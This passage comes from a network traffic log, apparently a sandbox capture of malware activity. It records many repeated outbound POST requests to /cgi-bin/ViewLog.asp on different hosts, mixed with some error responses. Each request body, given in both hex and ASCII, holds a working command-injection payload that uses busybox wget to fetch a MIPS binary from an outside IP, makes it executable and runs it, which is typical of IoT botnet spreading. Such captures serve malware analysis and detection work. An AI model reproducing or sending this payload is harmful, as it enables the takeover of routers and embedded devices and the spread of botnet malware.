                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:20.934324026 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.798214912 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              325192.168.2.133534694.120.244.928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:44.956670046 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              326192.168.2.134818294.122.95.1958080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:44.961041927 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              327192.168.2.135005694.120.32.978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:44.965996981 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              328192.168.2.136051862.104.101.598080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:45.797724009 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:46.002746105 CET287INHTTP/1.1 400 Bad Request
                                              Content-type: text/html
                                              Date: Thu, 23 Nov 2023 05:16:45 GMT
                                              Last-modified: Thu, 23 Nov 2023 05:16:45 GMT
                                              Server: GIANTS Dedicated Server GIANTS Dedicated Server/9.2.0.0
                                              Content-Length: 58


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              329192.168.2.136054662.104.101.598080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:46.192322969 CET287INHTTP/1.1 400 Bad Request
                                              Content-type: text/html
                                              Date: Thu, 23 Nov 2023 05:16:46 GMT
                                              Last-modified: Thu, 23 Nov 2023 05:16:46 GMT
                                              Server: GIANTS Dedicated Server GIANTS Dedicated Server/9.2.0.0
                                              Content-Length: 58


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              330192.168.2.134543885.221.231.1028080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:46.204039097 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:46.426894903 CET285INHTTP/1.0 404 Not Found
                                              Content-type: text/html
                                              Date: Fri, 03 Apr 1970 19:48:25 GMT
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL was not found</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              331192.168.2.135302262.150.151.2448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:46.278460026 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:46.562297106 CET367INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 106
                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              332192.168.2.134544285.221.231.1028080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:46.669624090 CET278INHTTP/1.0 400 Bad Request
                                              Content-type: text/html
                                              Date: Fri, 03 Apr 1970 19:48:25 GMT
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Unsupported method</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              333192.168.2.134809062.245.72.718080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:46.825052977 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              334192.168.2.135283831.136.89.1478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:47.008106947 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:47.590413094 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:48.710479975 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:50.982414007 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:55.590447903 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:04.550479889 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:22.982353926 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.846214056 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              335192.168.2.133786231.136.156.1058080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:47.008485079 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:47.590413094 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:48.710494995 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:50.982413054 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:55.590447903 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:04.550479889 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
